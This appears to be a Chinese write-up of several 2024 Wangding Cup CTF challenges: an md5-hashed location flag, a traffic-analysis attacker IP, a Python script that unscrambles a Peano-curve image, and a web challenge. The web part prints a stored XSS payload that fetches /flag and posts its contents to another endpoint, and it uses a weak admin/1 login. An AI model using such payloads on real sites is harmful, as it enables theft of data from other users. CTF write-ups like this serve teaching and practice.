2024网鼎杯青龙组Web+Misc部分WP

MISC01

发现人员的定位信息存在泄露,请对其进行分析。flag为用户位置信息进行32位md5哈希值

我们在这里可以找到关于Location------information信息

尝试把val值继续32位md5哈希加密,拿到flag

flag{4c4e66ea9aa659b1cac5d4fe327bbfc1}

MISC03

第 1 步:看到好几个上传木马的 ip,都试一试,最终 ip 为 39.168.5.60 的为

正确攻击 ip

MISC04

推测应该是按着曲线的轨迹将像素还原到原来的位置

脚本如下:

python 复制代码
from PIL import Image
from tqdm import tqdm

def peano(n):
    if n == 0:
        return [[0,0]]
    else:
        in_lst = peano(n - 1)
        lst = in_lst.copy()
        px,py = lst[-1]
        lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + 1 + i[0], py - i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px - i[0], py - 1 - i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + i[0], py - 1 - i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + 1 + i[0], py + i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)
        return lst

order = peano(6)

img = Image.open(r"C:\Users\ASUSROG\Desktop\chal.png")

width, height = img.size

block_width = width # // 3
block_height = height # // 3

new_image = Image.new("RGB", (width, height))

for i, (x, y) in tqdm(enumerate(order)):
    # 根据列表顺序获取新的坐标
    new_x, new_y = i % width, i // width
    # 获取原图像素
    pixel = img.getpixel((x, height - 1 - y))
    # 在新图像中放置像素
    new_image.putpixel((new_x, new_y), pixel)

new_image.save("rearranged_image.jpg") 

拿到二维码,扫描拿到flag

参考:IrisCTF2024 | 1r0ny

WEB02(环境关了没图片呜呜呜)

第 1 步:打开网页,目录扫描扫描到/flag,尝试访问,提示只有 boos 可以访

问。

第 2 步:尝试登录,admin/1,登录成功。

第 3 步:

复制代码
<script>fetch('/flag').then(response=>response.text()).then(data=>{fetch('/content/a9571d0
e889a28847d8682903',{method:'POST',headers:{'Content-Type':'application/x-www-form- 
urlencoded'},body:"content="+data});})</script>

更新之后提交给 boos,刷新页面拿到 flag

相关推荐
UI设计和前端开发从业者6 分钟前
UI前端大数据处理策略优化:基于云计算的数据存储与计算
前端·ui·云计算
liulilittle18 分钟前
深度剖析:OPENPPP2 libtcpip 实现原理与架构设计
开发语言·网络·c++·tcp/ip·智能路由器·tcp·通信
88号技师24 分钟前
2025年6月一区-田忌赛马优化算法Tianji’s horse racing optimization-附Matlab免费代码
开发语言·算法·matlab·优化算法
Tipriest_25 分钟前
Python关键字梳理
python·关键字·keyword
勤奋的知更鸟30 分钟前
Java 编程之模板方法模式
java·开发语言·模板方法模式
前端小巷子32 分钟前
Web开发中的文件上传
前端·javascript·面试
翻滚吧键盘1 小时前
{{ }}和v-on:click
前端·vue.js
上单带刀不带妹1 小时前
手写 Vue 中虚拟 DOM 到真实 DOM 的完整过程
开发语言·前端·javascript·vue.js·前端框架
im_AMBER2 小时前
学习日志05 python
python·学习
杨进军2 小时前
React 创建根节点 createRoot
前端·react.js·前端框架